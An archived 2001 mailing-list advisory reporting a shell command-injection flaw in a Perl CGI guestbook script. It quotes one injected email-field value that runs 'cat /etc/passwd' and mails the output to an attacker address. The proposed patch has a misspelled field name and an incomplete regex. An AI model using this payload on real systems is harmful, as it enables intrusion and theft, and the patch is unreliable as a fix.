cgi vulnerability

From: supdavid (supdavidat_private)
Date: Tue Oct 30 2001 - 07:04:23 PST

Next message: snsadvat_private: "[SNS Advisory No.45]Manpower Japan Potential Personal Information Leak Vulnerability"

Previous message: IBM MSS Advisory Service: "IBM AIX: Buffer oveflow vulnerability in CDE DtSvc library"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

hi all
I found a security hole in Book of guests and Post it! written by Seth
Leonard. It is available at http://www.dreamcachersweb.com
The problem is that this script doesn't filter out ANY metacharacters from
the input and pass it to the shell.
Therefore by writing something like emailat_private;cat /etc/passwd|mail
evilat_private into the email field,  the attacker could take control
over the host.

patch:
first of all it isn't a bad idea to set the permissions of the script
corectly. Furthermore the line
if ($INPUT{'email'} =~ /(.*)@(.*)/) { ... } should be replaced by something
like
if ($INPUT{'emai'} =~ /^[\w-.]+\@[\w-.]) { ... }

David Kumme, 16

Next message: snsadvat_private: "[SNS Advisory No.45]Manpower Japan Potential Personal Information Leak Vulnerability"
Previous message: IBM MSS Advisory Service: "IBM AIX: Buffer oveflow vulnerability in CDE DtSvc library"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Oct 30 2001 - 09:27:56 PST